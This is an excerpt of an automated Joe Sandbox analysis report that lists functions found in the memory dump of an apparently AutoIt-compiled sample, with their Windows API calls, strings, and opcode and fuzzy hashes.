                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2326795674-1439706946
                                                            • Opcode ID: fce8a823c14b72c6d5555bb28ba76d24aa893a859eb02f5e915112cd8a6dc335
                                                            • Instruction ID: d8fa18e74133994fdb98ea3895a8cfb5e8d4aecfa3decc62c6f3407bb906be4c
                                                            • Opcode Fuzzy Hash: fce8a823c14b72c6d5555bb28ba76d24aa893a859eb02f5e915112cd8a6dc335
                                                            • Instruction Fuzzy Hash: 95219132500268AFDF228E55CC46FEA3B69EF48724F110214FE156B1D0DAB5AC919BA0
                                                            Function 003E7B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003E7C4A
                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003E7C58
                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003E7C5F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$DestroyWindow
                                                            • String ID: msctls_updown32
                                                            • API String ID: 4014797782-2298589950
                                                            • Opcode ID: d02d331da6f164282f8b3fc923d874f01066502f6e40d9a2a5bc5ab5f35a2f02
                                                            • Instruction ID: 4f60e0127528c0729cdc4ea582ea03d11262ccb97b9a31a321b5ee64840913ef
                                                            • Opcode Fuzzy Hash: d02d331da6f164282f8b3fc923d874f01066502f6e40d9a2a5bc5ab5f35a2f02
                                                            • Instruction Fuzzy Hash: B7219CB1204259AFDB22DF24DCC1DA737ACEB4A394B150159F9019B3A1CB71EC118A60
                                                            Function 003E6CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003E6D3B
                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003E6D4B
                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003E6D70
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$MoveWindow
                                                            • String ID: Listbox
                                                            • API String ID: 3315199576-2633736733
                                                            • Opcode ID: f479828a492b402016140b637e49f85fa59392383073b40db8a20a2b0a73a48c
                                                            • Instruction ID: c25ae76c78a5fcaebe6fcf98afad806ea5246afbb54ed5bff4b31b840ae7ec97
                                                            • Opcode Fuzzy Hash: f479828a492b402016140b637e49f85fa59392383073b40db8a20a2b0a73a48c
                                                            • Instruction Fuzzy Hash: 66218332600168BFDF228F55CC45FBB37AAEF997A0F518224F9455B1D1C6719C5187A0
                                                            Function 003D39E9 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __snwprintf.LIBCMT ref: 003D3A66
                                                              • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __snwprintf_memmove
                                                            • String ID: , $$AUTOITCALLVARIABLE%d$%?
                                                            • API String ID: 3506404897-1727123861
                                                            • Opcode ID: b077433487cbfdba5b7139745364edee5110b9defc4834bacf3bc0166b148f7d
                                                            • Instruction ID: b3d51eee7e8d1ccd8fee0688ad858e30f9e03d16d84bf90d6310dd3799062ab9
                                                            • Opcode Fuzzy Hash: b077433487cbfdba5b7139745364edee5110b9defc4834bacf3bc0166b148f7d
                                                            • Instruction Fuzzy Hash: 6C219372B00219AFCF12EF64DC82AEE77B5AF44300F50445AF545AB286DB74EE41CB66
                                                            Function 003E770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003E7772
                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003E7787
                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003E7794
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 3850602802-1010561917
                                                            • Opcode ID: fd1e4986c4099553fbabeecd051fe70b7b14bd50e186d88471b8d70858694780
                                                            • Instruction ID: 83c3e37bded4ad23f741d3ee9c85be24492b3b7552a1d423e608d1af19ab3036
                                                            • Opcode Fuzzy Hash: fd1e4986c4099553fbabeecd051fe70b7b14bd50e186d88471b8d70858694780
                                                            • Instruction Fuzzy Hash: BE113A72244248BFEF215F61CC01FE7776CEF89B54F124228F641A60D0C272E851CB10
                                                            Function 00386B71 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: __calloc_crt
                                                            • String ID: A$@BB
                                                            • API String ID: 3494438863-782587721
                                                            • Opcode ID: c4017c12f4d4e618c95e1431312ed6273fdb10ad8f748a1a6a77210f19d68cd4
                                                            • Instruction ID: bc02692332c5bc6255f6f44652f87d09d2bfbfe4fef34e0322f75b65a7704740
                                                            • Opcode Fuzzy Hash: c4017c12f4d4e618c95e1431312ed6273fdb10ad8f748a1a6a77210f19d68cd4
                                                            • Instruction Fuzzy Hash: 3FF0A475304712CBE737AF16BC52AA22795E700338F9000A6E500CE1C0EB3488824B98
                                                            Function 00389B79 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __lock.LIBCMT ref: 00389B94
                                                              • Part of subcall function 00389C0B: __mtinitlocknum.LIBCMT ref: 00389C1D
                                                              • Part of subcall function 00389C0B: EnterCriticalSection.KERNEL32(00000000,?,00389A7C,0000000D), ref: 00389C36
                                                            • __updatetlocinfoEx_nolock.LIBCMT ref: 00389BA4
                                                              • Part of subcall function 00389100: ___addlocaleref.LIBCMT ref: 0038911C
                                                              • Part of subcall function 00389100: ___removelocaleref.LIBCMT ref: 00389127
                                                              • Part of subcall function 00389100: ___freetlocinfo.LIBCMT ref: 0038913B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                            • String ID: 8A$8A
                                                            • API String ID: 547918592-441909865
                                                            • Opcode ID: 19a88e42b1ab8b896635e6aa6b53cd8e3c0e69192d23999425ec9bf3baff86fc
                                                            • Instruction ID: 8306589bb07c6e58d7d099d9fb76362ef3b2cff88125ea0e9f969e2f0af86406
                                                            • Opcode Fuzzy Hash: 19a88e42b1ab8b896635e6aa6b53cd8e3c0e69192d23999425ec9bf3baff86fc
                                                            • Instruction Fuzzy Hash: CBE0863954B300A5D613F7A5AA077A866505B00B21F6441DBF445590C1CE781540871F
                                                            Function 00364C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00364B83,?), ref: 00364C44
                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00364C56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: f4236449bf2477f572d6ee0fe1ca7561fe0d2d262b9163173be41d6895b05407
                                                            • Instruction ID: dc7cb42b9083b1a2b37b22af9957d13d25aa819f27534e198be95f72e85fe3e5
                                                            • Opcode Fuzzy Hash: f4236449bf2477f572d6ee0fe1ca7561fe0d2d262b9163173be41d6895b05407
                                                            • Instruction Fuzzy Hash: 79D05B30910723DFD7355F31D94864677D9AF05351F11C93ED496DA2A4E7B4D4C0C650
                                                            Function 00364C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00364BD0,?,00364DEF,?,004252F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00364C11
                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00364C23
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: 97008a653b51b185932be2a196bb503862c0f4fbcfdfae59fe205e6ace80249f
                                                            • Instruction ID: fd8fcbb23a8e2709afa77a29285a4c4be43e9f948906a483dcb83b74d4511fba
                                                            • Opcode Fuzzy Hash: 97008a653b51b185932be2a196bb503862c0f4fbcfdfae59fe205e6ace80249f
                                                            • Instruction Fuzzy Hash: A0D01230911713DFD7216F71D948647B6DAEF09351F11CD3ED486DA2A4E6F4D480C654
                                                            Function 003E0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,003E1039), ref: 003E0DF5
                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 003E0E07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: 7ef443137ae57e50f7884acb28757ef2a926965c57914b5ddc21276dc6a48508
                                                            • Instruction ID: abbb3468989213447fc16c44979599b77f6d1762a88838d0363605829d5e4271
                                                            • Opcode Fuzzy Hash: 7ef443137ae57e50f7884acb28757ef2a926965c57914b5ddc21276dc6a48508
                                                            • Instruction Fuzzy Hash: 87D0C231400B26DFC3224FB1C848382B2DAAF40341F118D3ED486D6190D7F4D8D0C604
                                                            Function 003D90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,003D8CF4,?,003EF910), ref: 003D90EE
                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003D9100
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                            • API String ID: 2574300362-199464113
                                                            • Opcode ID: 29206296b4b67380f91501006844953e566fec64170d2fc8382bb357a4742173
                                                            • Instruction ID: 5e652dd15887d81e51f44bfac44828cca7873abda4e2a21319e3dedd20ec9885
                                                            • Opcode Fuzzy Hash: 29206296b4b67380f91501006844953e566fec64170d2fc8382bb357a4742173
                                                            • Instruction Fuzzy Hash: 9AD01735510723CFDB229F32E85874676E8AF05351F13CA3FD48ADA690EAB4C880CA90
                                                            Function 003A1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: LocalTime__swprintf
                                                            • String ID: %.3d$WIN_XPe
                                                            • API String ID: 2070861257-2409531811
                                                            • Opcode ID: 6f3150c54c8ee4f933f0c96beb7160bb406626ee7d0a476928db07201388cde1
                                                            • Instruction ID: 7bdf92f2429b0020381a5085dad51bfac6222465f8651f8de341f10a677dd8ff
                                                            • Opcode Fuzzy Hash: 6f3150c54c8ee4f933f0c96beb7160bb406626ee7d0a476928db07201388cde1
                                                            • Instruction Fuzzy Hash: 32D01776844218FACB139A90D8888F9737CEB1A701F242562F906E2480E2668B94EA25
                                                            Function 003B717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6546b8b7e508d59faf13d46df6153334af70be74d63cdaf6bf240564dde1a2fc
                                                            • Instruction ID: 75c7434478536c31fe61a8054f759a715756ab06fe74d10f4ec6de7b5e2c204e
                                                            • Opcode Fuzzy Hash: 6546b8b7e508d59faf13d46df6153334af70be74d63cdaf6bf240564dde1a2fc
                                                            • Instruction Fuzzy Hash: 44C18174A04216EFCB15CFA5C884EAEBBF5FF88308B154598E909EB651D730DD41DB90
                                                            Function 003DE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharLowerBuffW.USER32(?,?), ref: 003DE0BE
                                                            • CharLowerBuffW.USER32(?,?), ref: 003DE101
                                                              • Part of subcall function 003DD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 003DD7C5
                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 003DE301
                                                            • _memmove.LIBCMT ref: 003DE314
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                            • String ID:
                                                            • API String ID: 3659485706-0
                                                            • Opcode ID: ee578ed592658bb8970580a631f0aecacfcf33bcbefc4f7e6b1a2c4089690251
                                                            • Instruction ID: 713bf34ec8d645bd54d3951bab64149f0bae6587d0dbe6285491ac7b77ce3654
                                                            • Opcode Fuzzy Hash: ee578ed592658bb8970580a631f0aecacfcf33bcbefc4f7e6b1a2c4089690251
                                                            • Instruction Fuzzy Hash: 75C14876608301DFC716EF28C480A6ABBE4FF89714F14896EF8999B351D731E946CB81
                                                            Function 003D8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CoInitialize.OLE32(00000000), ref: 003D80C3
                                                            • CoUninitialize.OLE32 ref: 003D80CE
                                                              • Part of subcall function 003BD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 003BD5D4
                                                            • VariantInit.OLEAUT32(?), ref: 003D80D9
                                                            • VariantClear.OLEAUT32(?), ref: 003D83AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                            • String ID:
                                                            • API String ID: 780911581-0
                                                            • Opcode ID: 42caead308cf1b44881c19e7c9d0aa73c627fddc54bac914f86d4a2151ffa106
                                                            • Instruction ID: f1c1336f6a5de5d6913a32b4fce5dfec0d2499668b48889e310cf81e8984f0e8
                                                            • Opcode Fuzzy Hash: 42caead308cf1b44881c19e7c9d0aa73c627fddc54bac914f86d4a2151ffa106
                                                            • Instruction Fuzzy Hash: 77A1497A6047019FCB12DF54D481B2AB7E8BF89714F04885AF9999B3A1CB30FD05CB41
                                                            Function 003B687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Variant$AllocClearCopyInitString
                                                            • String ID:
                                                            • API String ID: 2808897238-0
                                                            • Opcode ID: f6cb38742bbde1555bfccd38abbcb334dd3fb66c5ede75d32b38eb844ba3f1a7
                                                            • Instruction ID: 5fd3f07705aa7404cbcfd91b577db3e07fc4c27bed1a727175aed8afb8a8ae94
                                                            • Opcode Fuzzy Hash: f6cb38742bbde1555bfccd38abbcb334dd3fb66c5ede75d32b38eb844ba3f1a7
                                                            • Instruction Fuzzy Hash: F251CA747003419ECF26AF65D892AB9B3E99F44314F20C81FE686DBA93DB78D8448701
                                                            Function 003E97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(0164EC78,?), ref: 003E9863
                                                            • ScreenToClient.USER32(00000002,00000002), ref: 003E9896
                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 003E9903
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1304238040.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                            • Associated: 00000000.00000002.1304210070.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304330387.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304524000.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1304554280.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_360000_SpCuEoekPa.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMoveRectScreen
                                                            • String ID:
                                                            • API String ID: 3880355969-0
                                                            • Opcode ID: b830fefbf6cc2a3f7b719ab1961d8f776b3772340d6302b1c4dbd42ae735e7b3
                                                            • Instruction ID: 5134029084ab330596af01d64ca70d4e89d5928108c044c289e3101504fb0efc
                                                            • Opcode Fuzzy Hash: b830fefbf6cc2a3f7b719ab1961d8f776b3772340d6302b1c4dbd42ae735e7b3
                                                            • Instruction Fuzzy Hash: 16515F34A00258EFCF22DF25D880AAE7BB5FF45360F15826AF8559B2E1D770AD41CB90
                                                            Function 003B9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                            Download Yara Rule
                                                            APIs
